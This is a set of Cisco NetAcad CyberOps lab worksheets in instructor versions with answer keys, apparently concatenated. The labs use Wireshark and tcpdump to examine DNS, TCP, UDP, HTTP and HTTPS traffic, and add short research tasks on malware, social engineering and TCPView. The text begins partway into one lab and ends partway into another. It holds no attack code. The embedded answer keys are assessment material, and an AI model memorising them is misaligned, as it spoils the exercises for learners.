Lab - Using Wireshark to Examine a UDP DNS Capture

using port numbers that are not reserved. The destination port is 53. Port 53 is a well-known port
reserved for use with DNS. DNS servers listen on port 53 for DNS queries from clients.

In this example, the length of the UDP segment is 40 bytes. The length of the UDP segment in your
example may be different. Out of 40 bytes, 8 bytes are used as the header. The other 32 bytes are used
by DNS query data. The 32 bytes of DNS query data is in the following illustration in the packet bytes
pane (lower section) of the Wireshark main window.

The checksum is used to determine the integrity of the UDP header after it has traversed the Internet.
The UDP header has low overhead because UDP does not have fields that are associated with the three-
way handshake in TCP. Any data transfer reliability issues that occur must be handled by the application
layer.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 5 of 7 www.netacad.com
Lab - Using Wireshark to Examine a UDP DNS Capture

Record your Wireshark results in the table below:

Frame size

Source MAC address

Destination MAC address

Source IP address

Destination IP address

Source port

Destination port

Is the source IP address the same as the local PC’s IP address you recorded in Part 1? _____________
Yes
Is the destination IP address the same as the default gateway noted in Part 1? _____________
Yes, if the default gateway is also performing DNS.

Step 3: Examine the fields in a DNS response packet.

In this step, you will examine the DNS response packet and verify that the DNS response packet also uses
the UDP.
a. In this example, frame 24 is the corresponding DNS response packet. Notice the number of bytes on the
wire is 90. It is a larger packet compared to the DNS query packet. This is because the DNS response
packet will include a variety of information about the domain.

b. In the Ethernet II frame for the DNS response, what device is the source MAC address and what device is
the destination MAC address?
____________________________________________________________________________________
The source MAC address is the default gateway and the destination MAC address is the VM.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 6 of 7 www.netacad.com
Lab - Using Wireshark to Examine a UDP DNS Capture

c. Notice the source and destination IP addresses in the IP packet. What is the destination IP address?
What is the source IP address?
Destination IP address: _______________________Source IP address: ________________________
The answer will vary. In this example, the destination is 192.168.1.19 and the source is 192.168.1.1.
What happened to the roles of source and destination for the VM and default gateway?
____________________________________________________________________________________
____________________________________________________________________________________
The VM and the default gateway have reversed their roles in DNS query and response packets.
d. In the UDP segment, the role of the port numbers has also reversed. The destination port number is
39964. Port number 39964 is the same port that was generated by the VM when the DNS query was sent
to the DNS server. Your VM listens for a DNS response on this port.
The source port number is 53. The DNS server listens for a DNS query on port 53 and then sends a DNS
response with a source port number of 53 back to the originator of the DNS query.
When the DNS response is expanded, notice the resolved IP addresses for www.google.com in the
Answers section.

Reflection
What are the benefits of using UDP instead of TCP as a transport protocol for DNS?
_______________________________________________________________________________________
_______________________________________________________________________________________
UDP as a transport protocol provides quick session establishment, quick response, minimal overhead, no
need for retries, segment reassembly, and acknowledgment of received packets.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 7 of 7 www.netacad.com
Lab - Using Wireshark to Examine TCP and UDP Captures
(Instructor Version)
Instructor Note: Red font color or gray highlights indicate text that appears in the instructor copy only.

Topology – Part 1 (FTP)

Part 1 will highlight a TCP capture of an FTP session. This topology consists of the CyberOps Workstation
VM with Internet access.

Mininet Topology – Part 2 (TFTP)

Part 2 will highlight a UDP capture of a TFTP session using the hosts in Mininet.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 1 of 13 www.netacad.com
Lab - Using Wireshark to Examine TCP and UDP Captures

Objectives
Part 1: Identify TCP Header Fields and Operation Using a Wireshark FTP Session Capture
Part 2: Identify UDP Header Fields and Operation Using a Wireshark TFTP Session Capture

Background / Scenario
Two protocols in the TCP/IP transport layer are TCP (defined in RFC 761) and UDP (defined in RFC 768).
Both protocols support upper-layer protocol communication. For example, TCP is used to provide transport
layer support for the HyperText Transfer Protocol (HTTP) and FTP protocols, among others. UDP provides
transport layer support for the Domain Name System (DNS) and TFTP, among others.
In Part 1 of this lab, you will use the Wireshark open source tool to capture and analyze TCP protocol header
fields for FTP file transfers between the host computer and an anonymous FTP server. The terminal
command line is used to connect to an anonymous FTP server and download a file. In Part 2 of this lab, you
will use Wireshark to capture and analyze UDP header fields for TFTP file transfers between two Mininet host
computers.
Instructor Note: Using a packet sniffer, such as Wireshark may be considered a breach of the security policy
of the school. It is recommended that permission be obtained before running Wireshark for this lab. If using a
packet sniffer is an issue, the instructor may wish to assign the lab as homework or perform a walk-through
demonstration.

Required Resources
 CyberOps Workstation VM
 Internet access

Part 1: Identify TCP Header Fields and Operation Using a Wireshark FTP
Session Capture
In Part 1, you use Wireshark to capture an FTP session and inspect TCP header fields.

Step 1: Start a Wireshark capture.

a. Start and log into the CyberOps Workstation VM. Open a terminal window and start Wireshark. Enter the
password cyberops and click OK when prompted.
[analyst@secOps ~]$ sudo wireshark-gtk
b. Start a Wireshark capture for the enp0s3 interface.
c. Open another terminal window to access an external ftp site. Enter ftp ftp.cdc.gov at the prompt. Log
into the FTP site for Centers for Disease Control and Prevention (CDC) with user anonymous and no
password.
[analyst@secOps ~]$ ftp ftp.cdc.gov
Connected to ftp.cdc.gov.
220 Microsoft FTP Service
Name (ftp.cdc.gov:analyst): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp>

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 2 of 13 www.netacad.com
Lab - Using Wireshark to Examine TCP and UDP Captures

Step 2: Download the Readme file.

a. Locate and download the Readme file by entering the ls command to list the files.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
-rwxrwxrwx 1 owner group 128 May 9 1995 .change.dir
-rwxrwxrwx 1 owner group 107 May 9 1995 .message
drwxrwxrwx 1 owner group 0 Feb 2 11:21 pub
-rwxrwxrwx 1 owner group 1428 May 13 1999 Readme
-rwxrwxrwx 1 owner group 383 May 13 1999 Siteinfo
-rwxrwxrwx 1 owner group 0 May 17 2005 up.htm
drwxrwxrwx 1 owner group 0 May 20 2010 w3c
-rwxrwxrwx 1 owner group 202 Sep 22 1998 welcome.msg
226 Transfer complete.
Note: You may receive the following message:
421 Service not available, remote server has closed connection
ftp: No control connection for command
If this happens, then the FTP server is currently down. However, you can proceed with the rest of the lab
analyzing those packets that you were able to capture and reading along for packets you didn’t capture.
You can also return to the lab later to see if the FTP server is back up.
b. Enter the command get Readme to download the file. When the download is complete, enter the
command quit to exit.
ftp> get Readme
200 PORT command successful.
125 Data connection already open; Transfer starting.
WARNING! 36 bare linefeeds received in ASCII mode
File may not have transferred correctly.
226 Transfer complete.
1428 bytes received in 0.056 seconds (24.9 kbytes/s)
c. After the transfer is complete, enter quit to exit ftp.

Step 3: Stop the Wireshark capture.

Step 4: View the Wireshark main window.

Wireshark captured many packets during the FTP session to ftp.cdc.gov. To limit the amount of data for
analysis, apply the filter tcp and ip.addr == 198.246.117.106 and click Apply.
Note: The IP address, 198.246.117.106, is the address for ftp.cdc.gov at the time this lab was created. The IP
address may be different for you. If so, look for the first TCP packet that started the 3-way handshake with
ftp.cdc.gov. The destination IP address is the IP address you should use for your filter.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 3 of 13 www.netacad.com
Lab - Using Wireshark to Examine TCP and UDP Captures

Note: Your Wireshark interface may look slightly different than the above image.

Step 5: Analyze the TCP fields.

After the TCP filter has been applied, the first three packets (top section) display the the sequence of [SYN],
[SYN, ACK], and [ACK] which is the TCP three-way handshake.

TCP is routinely used during a session to control datagram delivery, verify datagram arrival, and manage
window size. For each data exchange between the FTP client and FTP server, a new TCP session is started.
At the conclusion of the data transfer, the TCP session is closed. When the FTP session is finished, TCP
performs an orderly shutdown and termination.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 4 of 13 www.netacad.com
Lab - Using Wireshark to Examine TCP and UDP Captures

In Wireshark, detailed TCP information is available in the packet details pane (middle section). Highlight the
first TCP datagram from the host computer, and expand portions of the TCP datagram as shown below.

The expanded TCP datagram appears similar to the packet detail pane shown below.

The image above is a TCP datagram diagram. An explanation of each field is provided for reference:
 The TCP source port number belongs to the TCP session host that opened a connection. The value is
normally a random value above 1,023.
 The TCP destination port number is used to identify the upper layer protocol or application on the
remote site. The values in the range 0–1,023 represent the “well-known ports” and are associated with
popular services and applications (as described in RFC 1700), such as Telnet, FTP, and HTTP. The
combination of the source IP address, source port, destination IP address, and destination port uniquely
identifies the session to the sender and receiver.
Note: In the Wireshark capture above, the destination port is 21, which is FTP. FTP servers listen on port 21
for FTP client connections.
 The Sequence number specifies the number of the last octet in a segment.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 5 of 13 www.netacad.com
Lab - Using Wireshark to Examine TCP and UDP Captures

 The Acknowledgment number specifies the next octet expected by the receiver.
 The Code bits have a special meaning in session management and in the treatment of segments.
Among interesting values are:
- ACK — Acknowledgment of a segment receipt.
- SYN — Synchronize, only set when a new TCP session is negotiated during the TCP three-way
handshake.
- FIN — Finish, the request to close the TCP session.
 The Window size is the value of the sliding window. It determines how many octets can be sent before
waiting for an acknowledgment.
 The Urgent pointer is only used with an Urgent (URG) flag when the sender needs to send urgent data
to the receiver.
 The Options has only one option currently, and it is defined as the maximum TCP segment size (optional
value).
Using the Wireshark capture of the first TCP session startup (SYN bit set to 1), fill in information about the
TCP header. Some fields may not apply to this packet.
From the VM to CDC server (only the SYN bit is set to 1):

Source IP address 192.168.1.17*

Destination IP address 198.246.117.106

Source port number 49411*

Destination port number 21
Sequence number 0 (relative)
Acknowledgment number Not applicable for this capture
Header length 32 bytes
Window size 8192

*Student answers will vary.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 6 of 13 www.netacad.com
Lab - Using Wireshark to Examine TCP and UDP Captures

In the second Wireshark filtered capture, the CDC FTP server acknowledges the request from the VM. Note
the values of the SYN and ACK bits.

Fill in the following information regarding the SYN-ACK message.

Source IP address 198.246.117.106

Destination IP address 192.168.1.17*
Source port number 21
Destination port number 49411*
Sequence number 0 (relative)
Acknowledgment number 1 (relative)
Header length 32 bytes
Window size 8192

*Student answers will vary.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 7 of 13 www.netacad.com
Lab - Using Wireshark to Examine TCP and UDP Captures

In the final stage of the negotiation to establish communications, the VM sends an acknowledgment message
to the server. Notice that only the ACK bit is set to 1, and the Sequence number has been incremented to 1.

Fill in the following information regarding the ACK message.

Source IP address 192.168.1.17*

Destination IP address 198.246.112.54

Source port number 49411*

Destination port number 21

Sequence number 1 (relative)

Acknowledgment number 1 (relative)

Header length 20

Window size 8192*

*Student answers will vary.

How many other TCP datagrams contained a SYN bit?
_______________________________________________________________________________________
One. The first packet sent by the host at the beginning of a TCP session.
After a TCP session is established, FTP traffic can occur between the PC and FTP server. The FTP client and
server communicate with each other, unaware that TCP has control and management over the session.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 8 of 13 www.netacad.com
Lab - Using Wireshark to Examine TCP and UDP Captures

When the FTP server sends a Response: 220 to the FTP client, the TCP session on the FTP client sends an
acknowledgment to the TCP session on the server. This sequence is visible in the Wireshark capture below.

When the FTP session has finished, the FTP client sends a command to “quit”. The FTP server
acknowledges the FTP termination with a Response: 221 Goodbye. At this time, the FTP server TCP session
sends a TCP datagram to the FTP client, announcing the termination of the TCP session. The FTP client TCP
session acknowledges receipt of the termination datagram, then sends its own TCP session termination.
When the originator of the TCP termination (the FTP server) receives a duplicate termination, an ACK
datagram is sent to acknowledge the termination and the TCP session is closed. This sequence is visible in
the diagram and capture below.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 9 of 13 www.netacad.com
Lab - Using Wireshark to Examine TCP and UDP Captures

By applying an ftp filter, the entire sequence of the FTP traffic can be examined in Wireshark. Notice the
sequence of the events during this FTP session. The username anonymous was used to retrieve the
Readme file. After the file transfer completed, the user ended the FTP session.

Apply the TCP filter again in Wireshark to examine the termination of the TCP session. Four packets are
transmitted for the termination of the TCP session. Because TCP connection is full-duplex, each direction
must terminate independently. Examine the source and destination addresses.
In this example, the FTP server has no more data to send in the stream. It sends a segment with the FIN flag
set in frame 149. The PC sends an ACK to acknowledge the receipt of the FIN to terminate the session from
the server to the client in frame 150.
In frame 151, the PC sends a FIN to the FTP server to terminate the TCP session. The FTP server responds
with an ACK to acknowledge the FIN from the PC in frame 152. Now the TCP session is terminated between
the FTP server and PC.

Part 2: Identify UDP Header Fields and Operation Using a Wireshark TFTP
Session Capture
In Part 2, you use Wireshark to capture a TFTP session and inspect the UDP header fields.

Step 1: Start Mininet and tftpd service.

a. Start Mininet. Enter cyberops as the password when prompted.
[analyst@secOps ~]$ sudo lab.support.files/scripts/cyberops_topo.py
[sudo] password for analyst:

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 10 of 13 www.netacad.com
Lab - Using Wireshark to Examine TCP and UDP Captures

b. Start H1 and H2 at the mininet> prompt.

*** Starting CLI:
mininet> xterm H1 H2
c. In the H1 terminal window, start the tftpd server using the provided script.
[root@secOps analyst]# /home/analyst/lab.support.files/scripts/start_tftpd.sh
[root@secOps analyst]#

Step 2: Create a file for tftp transfer.

a. Create a text file at the H1 terminal prompt in the /srv/tftp/ folder.
[root@secOps analyst]# echo "This file contains my tftp data." >
/srv/tftp/my_tftp_data
b. Verify that the file has been created with the desired data in the folder.
[root@secOps analyst]# cat /srv/tftp/my_tftp_data
This file contains my tftp data.
c. Because of the security measure for this particular tftp server, the name of the receiving file needs to exist
already. On H2, create a file named my_tftp_data.
[root@secOps analyst]# touch my_tftp_data

Step 3: Capture a TFTP session in Wireshark

a. Start Wireshark in H1.
[root@secOps analyst]# wireshark-gtk &
b. From the Edit menu, choose Preferences and click the arrow to expand Protocols. Scroll down and
select UDP. Click the Validate the UDP checksum if possible check box and click Apply. Then click
OK.

c. Start a Wireshark capture on the interface H1-eth0.

d. Start a tftp session from H2 to the tftp server on H1 and get the file my_tftp_data.
[root@secOps analyst]# tftp 10.0.0.11 -c get my_tftp_data
e. Stop the Wireshark capture. Set the filter to tftp and click Apply. Use the three TFTP packets to fill in the
table and answer the questions in the rest of this lab.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 11 of 13 www.netacad.com
Lab - Using Wireshark to Examine TCP and UDP Captures

Instructor Note: If students point out UDP acknowledgments, explain that the UDP header does not
contain an acknowledgment field. It is the responsibility of the upper-layer protocol, in this case TFTP, to
manage data transfer and receipt information. This will be shown during the UDP datagram examination.
Detailed UDP information is available in the Wireshark packet details pane. Highlight the first UDP
datagram from the host computer and move the mouse pointer to the packet details pane. It may be
necessary to adjust the packet details pane and expand the UDP record by clicking the protocol expand
box. The expanded UDP datagram should look similar to the diagram below.

The figure below is a UDP datagram diagram. Header information is sparse, compared to the TCP
datagram. Similar to TCP, each UDP datagram is identified by the UDP source port and UDP destination
port.

Using the Wireshark capture of the first UDP datagram, fill in information about the UDP header. The
checksum value is a hexadecimal (base 16) value, denoted by the preceding 0x code:
Source IP address 10.0.0.12
Destination IP address 10.0.0.11
Source port number 47844
Destination port number 69
UDP message length 32 bytes*
UDP checksum 0x2029 [correct]*

*Student answers will vary.

How does UDP verify datagram integrity?
____________________________________________________________________________________
____________________________________________________________________________________

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 12 of 13 www.netacad.com
Lab - Using Wireshark to Examine TCP and UDP Captures

A checksum is sent in the UDP datagram, and the datagram checksum value is recomputed upon receipt.
If the computed checksum is identical to the sent checksum, then the UDP datagram is assumed to be
complete.
Examine the first frame returned from the tftpd server. Fill in the information about the UDP header:
Source IP address 10.0.0.11
Destination IP address 10.0.0.12
Source port number 58047*
Destination port number 47844*
UDP message length 46 bytes*
Checksum: 0x1456 [incorrect, should be
0x8cce (maybe caused by "UDP checksum
UDP checksum offload"?)]*

*Student answers will vary.

Notice that the return UDP datagram has a different UDP source port, but this source port is used for the
remainder of the TFTP transfer. Because there is no reliable connection, only the original source port
used to begin the TFTP session is used to maintain the TFTP transfer.
Also, notice that the UDP Checksum is incorrect. This is most likely caused by UDP checksum offload.
You can learn more about why this happens by searching for “UDP checksum offload”.

Step 4: Clean up
In this step, you will shut down and clean up Mininet.
a. In the terminal that started Mininet, enter quit at the prompt.
mininet> quit
b. At the prompt, enter sudo mn – c to clean up the processes started by Mininet.
[analyst@secOps ~]$ sudo mn -c

Reflection
This lab provided the opportunity to analyze TCP and UDP protocol operations from captured FTP and TFTP
sessions. How does TCP manage communication differently than UDP?
_______________________________________________________________________________________
_______________________________________________________________________________________
TCP manages communication much differently than UDP because reliability and guaranteed delivery requires
additional control over the communication channel. UDP has less overhead and control, and the upper-layer
protocol must provide some type of acknowledgment control. Both protocols, however, transport data
between clients and servers using application layer protocols and are appropriate for the upper-layer protocol
each supports.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 13 of 13 www.netacad.com
Lab – Using Wireshark to Examine HTTP and HTTPS (Instructor
Version)
Instructor Note: Red font color or gray highlights indicate text that appears in the instructor copy only.

Objectives
Part 1: Capture and view HTTP traffic
Part 2: Capture and view HTTPS traffic

Background / Scenario
HyperText Transfer Protocol (HTTP) is an application layer protocol that presents data via a web browser.
With HTTP, there is no safeguard for the exchanged data between two communicating devices.
With HTTPS, encryption is used via a mathematical algorithm. This algorithm hides the true meaning of the
data that is being exchanged. This is done through the use of certificates that can be viewed later in this lab.
Regardless of HTTP or HTTPS, it is only recommended to exchange data with websites that you trust. Just
because a site uses HTTPS does not mean it is a trustworthy site. Threat actors commonly use HTTPS to
hide their activities.
In this lab, you will explore and capture HTTP and HTTPS traffic using Wireshark.

Required Resources
 CyberOps Workstation VM
 Internet connection

Part 1: Capture and view HTTP traffic

In this part, you will use tcpdump to capture the content of HTTP traffic. You will use command options to
save the traffic to a packet capture (pcap) file. These records can then be analyzed using different
applications that read pcap files, including Wireshark.

Step 1: Start the virtual machine and log in.

Start the CyberOps Workstation VM. Use the following user credentials:
Username: analyst
Password: cyberops

Step 2: Open a terminal and start tcpdump.

a. Open a terminal application and enter the command ifconfig.
[analyst@secOps ~]$ ifconfig
b. List the interfaces and their IP addresses displayed in the ifconfig output.
____________________________________________________________________________________
enp0s3 with 192.168.1.15 and lo with 127.0.0.1 (answers for enp0s3 will vary).

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 1 of 7 www.netacad.com
Lab – Using Wireshark to Examine HTTP and HTTPS

c. While in the terminal application, enter the command sudo tcpdump –i enp0s3 –s 0 –w
httpdump.pcap. Enter the password cyberops for the user analyst when prompted.
[analyst@secOps ~]$ sudo tcpdump –i enp0s3 –s 0 –w httpdump.pcap
[sudo] password for analyst:
tcpdump: listening on enp0s3, link-type EN10MB (Ethernet), capture size
262144 bytes
This command starts tcpdump and records network traffic on the enp0s3 interface.
The -i command option allows you to specify the interface. If not specified, the tcpdump will capture all
traffic on all interfaces.
The -s command option specifies the length of the snapshot for each packet. You should limit snaplen to
the smallest number that will capture the protocol information in which you are interested. Setting snaplen
to 0 sets it to the default of 262144, for backwards compatibility with recent older versions of tcpdump.
The -w command option is used to write the result of the tcpdump command to a file. Adding the
extension .pcap ensures that operating systems and applications will be able to read to file. All recorded
traffic will be printed to the file httpdump.pcap in the home directory of the user analyst.
Use the man pages for tcpdump to determine the usage of the -s and -w command options.
d. Open a web browser from the launch bar within the Linux Workstation. Navigate to
www.altoromutual.com/bank/login.aspx

Because this website uses HTTP, the traffic is not encrypted. Click the Username field to see the warning
pop up.
e. Enter a username of Admin with a password of Admin and click Login.
f. Close the virtual web browser.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 2 of 7 www.netacad.com
Lab – Using Wireshark to Examine HTTP and HTTPS

g. Return to the terminal window where tcpdump is running. Enter CTRL+C to stop the packet capture.

Step 3: View the HTTP capture.

The tcpdump, executed in the previous step, printed the output to a file named httpdump.pcap. This file is
located in the home directory for the user analyst.
a. Click the File Manager icon on the desktop and browse to the home folder for the user analyst. Double-
click the httpdump.pcap file to open it in Wireshark.

b. In the Wireshark application, filter for http and click Apply.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 3 of 7 www.netacad.com
Lab – Using Wireshark to Examine HTTP and HTTPS

c. Browse through the different HTTP messages and select the POST message.

d. In the lower window, the message is displayed. Expand the HTML Form URL Encoded: application/x-
www-form-urlencoded section.

What two pieces of information are displayed?

____________________________________________________________________________________
The uid of Admin and passw of Admin
e. Close the Wireshark application.

Part 2: Capture and View HTTPS Traffic

You will now use tcpdump from the command line of a Linux workstation to capture HTTPS traffic. After
starting tcpdump, you will generate HTTPS traffic while tcpdump records the contents of the network traffic.
These records will again be analyzed using Wireshark.

Step 1: Start tcpdump within a terminal.

a. While in the terminal application, enter the command sudo tcpdump –i enp0s3 –s 0 –w
httpsdump.pcap. Enter the password cyberops for the user analyst when prompted.
[analyst@secOps ~]$ sudo tcpdump –i enp0s3 –s 0 –w httpsdump.pcap
[sudo] password for analyst:
tcpdump: listening on enp0s3, link-type EN10MB (Ethernet), capture size
262144 bytes
This command will start tcpdump and record network traffic on the enp0s3 interface of the Linux
workstation. If your interface is different than enp0s3, please modify it when using the above command.
All recorded traffic will be printed to the file httpsdump.pcap in the home directory of the user analyst.
b. Open a web browser from the launch bar within the Linux Workstation. Navigate to www.netacad.com.
What do you notice about the website URL?
____________________________________________________________________________________
Answers will vary. The website is using HTTPS, and there is a lock.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 4 of 7 www.netacad.com
Lab – Using Wireshark to Examine HTTP and HTTPS

c. Click Log in.

d. Enter in your NetAcad username and password. Click Log In.

e. Close the virtual web browser.

f. Return to the terminal window where tcpdump is running. Enter CTRL+C to stop the packet capture.

Step 2: View the HTTPS capture.

The tcpdump executed in Step 1 printed the output to a file named httpsdump.pcap. This file is located in the
home directory for the user analyst.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 5 of 7 www.netacad.com
Lab – Using Wireshark to Examine HTTP and HTTPS

a. Click the Filesystem icon on the desktop and browse to the home folder for the user analyst. Open the
httpsdump.pcap file.

b. In the Wireshark application, expand the capture window vertically and then filter by HTTPS traffic via port
443.
Enter tcp.port==443 as a filter, and click Apply.

c. Browse through the different HTTPS messages and select an Application Data message.

d. In the lower window, the message is displayed.

What has replaced the HTTP section that was in the previous capture file?
____________________________________________________________________________________

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 6 of 7 www.netacad.com
Lab – Using Wireshark to Examine HTTP and HTTPS

After the TCP section, there is now a Secure Sockets Layer (SSL) section instead of HTTP.
e. Completely expand the Secure Sockets Layer section.

f. Click the Encrypted Application Data.

Is the application data in a plaintext or readable format?
____________________________________________________________________________________
The data payload is encrypted using TLSv1.2 and cannot be viewed.
g. Close all windows and shutdown the virtual machine.

Reflection
1. What are the advantages of using HTTPS instead of HTTP?
_______________________________________________________________________________________
_______________________________________________________________________________________
When using HTTPS, the data payload of a message is encrypted and can only be viewed by the devices that
are part of the encrypted conversation.
2. Are all websites that use HTTPS considered trustworthy?
_______________________________________________________________________________________
_______________________________________________________________________________________
No, because malicious websites can utilize HTTPS to appear legitimate while still capturing user data and
logins.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 7 of 7 www.netacad.com
Lab – Anatomy of Malware (Instructor Version)
Instructor Note: Red font color or gray highlights indicate text that appears in the instructor copy only.

Objectives
Research and analyze malware

Background / Scenario
Malware, or malicious software, refers to a variety of malicious software programs that can be used to cause
harm to computer systems, steal data, and bypass security measures. Malware can also attack critical
infrastructure, disable emergency services, cause assembly lines to make defective products, disable electric
generators, and disrupt transportation services. Security experts estimate that more than one million new
malware threats are released each day. A McAfee Labs report indicates almost 500 million known malware
threats at the end of 2015.
Note: You can use the web browser in virtual machine installed in a previous lab to research security related
issues. By using the virtual machine, you may prevent malware from being installed on your computer.

Required Resources
 PC or mobile device with Internet access

Conduct a Search of Recent Malware

a. Using your favorite search engine, conduct a search for recent malware. During your search, choose four
examples of malware, each one from a different malware type, and be prepared to discuss details on
what each does, how it each is transmitted and the impact each causes.
Examples of malware types include: Trojan, Hoax, Adware, Malware, PUP, Exploit, and Vulnerability.
Some suggested web sites to search malware are listed below:
McAfee
Malwarebytes
Security Week
TechNewsWorld
b. Read the information about the malware found from your search in step 1a, choose one and write a short
summary that explains what the malware does, how it is transmitted, and the impact it causes.
____________________________________________________________________________________
____________________________________________________________________________________
Answers will vary based on the malware chosen.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 1 of 1 www.netacad.com
Lab - Social Engineering (Instructor Version)
Instructor Note: Red font color or gray highlights indicate text that appears in the instructor copy only.

Objectives
Research and identify social engineering attacks

Background / Scenario
Social engineering is an attack with the goal of getting a victim to enter personal or sensitive information, this
type of attack can be performed by an attacker utilizing a keylogger, phishing email, or an in-person method.
This lab requires the research of social engineering and the identification of ways to recognize and prevent it.

Required Resources
 PC or mobile device with Internet access

Step 1: Read the following article.

Navigate to the following website and read it thoroughly to answer the following questions in step 2.
https://www.sans.org/reading-room/whitepapers/critical/methods-understanding-reducing-social-engineering-
attacks-36972

Step 2: Answer the following questions.

a. What are the three methods used in social engineering to gain access to information?
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
Answers should include electronic access, physical access, and social media.
b. What are three examples of social engineering attacks from the first two methods in step 2a?
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
Answers will vary but may include spear phishing via email, baiting with desired content, or tailgating.
c. Why is social networking a social engineering threat?
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
Answers should include that social networking usually encourages people to share personal information
along with interests and habits. (Full name, date of birth (DOB) home town, etc…).

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 1 of 2 www.netacad.com
Lab - Social Engineering

d. How can an organization defend itself from social engineering attacks?

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 2 of 2 www.netacad.com
Class Activity – What's Going On? (Instructor Version)
Instructor Note: Red font color or gray highlights indicate text that appears in the instructor copy only.

Objectives
Identify the processes running on a computer, the protocol they are using, and their local and remote port
addresses.

Background / Scenario
For a hacker to establish a connection to a remote computer, a port must be listening on that device. This
may be due to infection by malware, or a vulnerability in a legitimate piece of software. A utility, such as
TCPView, can be used to detect open ports, monitor them in real-time, and close active ports and processes
using them.

Required Resources
 PC with Internet access
 TCPView software

Step 1: Download and install the TCPView software.

a. Click on the link below to reach the download page for TCPView.
http://technet.microsoft.com/en-us/sysinternals/tcpview.aspx

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 1 of 3 www.netacad.com
Class Activity – What’s Going On?

b. Create a folder on the desktop named “TCPView”.

c. Extract the contents of the zip to this new folder.

d. Double-click the Tcpview Application to start it.

e. Finally, Agree to the software license terms.

Step 2: Answer the following questions.

a. How many Endpoints are listed?
____________________________________________________________________________________
Answers may vary, 55.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 2 of 3 www.netacad.com
Class Activity – What’s Going On?

b. How many are Listening?

____________________________________________________________________________________
Answers may vary, 24
c. How many Endpoints are Established?
____________________________________________________________________________________
Answers may vary, 1

Step 3: Use a browser and observe the TCPView window.

a. Open the Options menu and click “Always on Top”.
Note: Use the Help section of the program to help you answer the following questions.
b. Open any browser.
What happens in the TCPView window?
____________________________________________________________________________________
____________________________________________________________________________________
Answers may vary, multiple browser processes open and turn green across the screen, then some may
turn to yellow, red, or white.
c. Browse to cisco.com.
What happens in the TCPView window?
____________________________________________________________________________________
____________________________________________________________________________________
Answers may vary, more browser processes open as green across the screen, then some may turn to
yellow, red, or white.
d. Close the browser.
What happens in the TCPView window?
____________________________________________________________________________________
____________________________________________________________________________________
Answers may vary, after some time, multiple browser processes turn red as they close.
What do you think the colors mean?
____________________________________________________________________________________
____________________________________________________________________________________
Answers may vary, green lines indicate starting processes, yellow lines indicate processes that are
waiting to open or close, red lines indicate processes that are closing, and white lines indicate processes
that are running.
Note: To close a process directly, right-click the process and choose End Process. Using this method can
cause a program or the operating system to become unstable. Only end processes that you know are safe to
end. This method can be used to stop malware from communicating.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 3 of 3 www.netacad.com
Lab – Exploring DNS Traffic (Instructor Version)
Instructor Note: Red font color or gray highlights indicate text that appears in the instructor copy only.

Objectives
Part 1: Capture DNS Traffic
Part 2: Explore DNS Query Traffic
Part 3: Explore DNS Response Traffic

Background / Scenario
Wireshark is an open source packet capture and analysis tool. Wireshark gives a detailed breakdown of the
network protocol stack. Wireshark allows you to filter traffic for network troubleshooting, investigate security
issues, and analyze network protocols. Because Wireshark allows you to view the packet details, it can be
used as a reconnaissance tool for an attacker.
In this lab, you will install Wireshark on a Windows system and use Wireshark to filter for DNS packets and
view the details of both DNS query and response packets.

Required Resources
 1 Windows PC with Internet access and Wireshark installed
Instructor Note: Using a packet sniffer such as Wireshark may be considered a breach of the security policy
of the school. It is recommended that permission is obtained before running Wireshark for this lab. If using a
packet sniffer such as Wireshark is an issue, the instructor may wish to assign the lab as homework or
perform a walk-through demonstration.

Part 1: Capture DNS Traffic

Step 1: Download and install Wireshark.

a. Install Wireshark for Windows.
b. Wireshark can be downloaded from www.wireshark.org.
c. Choose the software version you need based on your PC’s architecture and operating system. For
instance, if you have a 64-bit PC running Windows, choose Windows Installer (64-bit).
d. After making a selection, the download should start. The location of the downloaded file depends on the
browser and operating system that you use. For Windows users, the default location is the Downloads
folder.
e. The downloaded file is named Wireshark-win64-x.x.x.exe, where x represents the version number.
Double-click the file to start the installation process.
Respond to any security messages that may display on your screen. If you already have a copy of
Wireshark on your PC, you will be prompted to uninstall the old version before installing the new version.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 1 of 12 www.netacad.com
Lab – Exploring DNS Traffic

It is recommended that you remove the old version of Wireshark prior to installing another version. Click
Yes to uninstall the previous version of Wireshark.

f. If this is the first time to install Wireshark, or after you have completed the uninstall process, you will
navigate to the Wireshark Setup wizard. Click Next.
g. Continue advancing through the installation process. Click I Agree when the License Agreement window
displays.
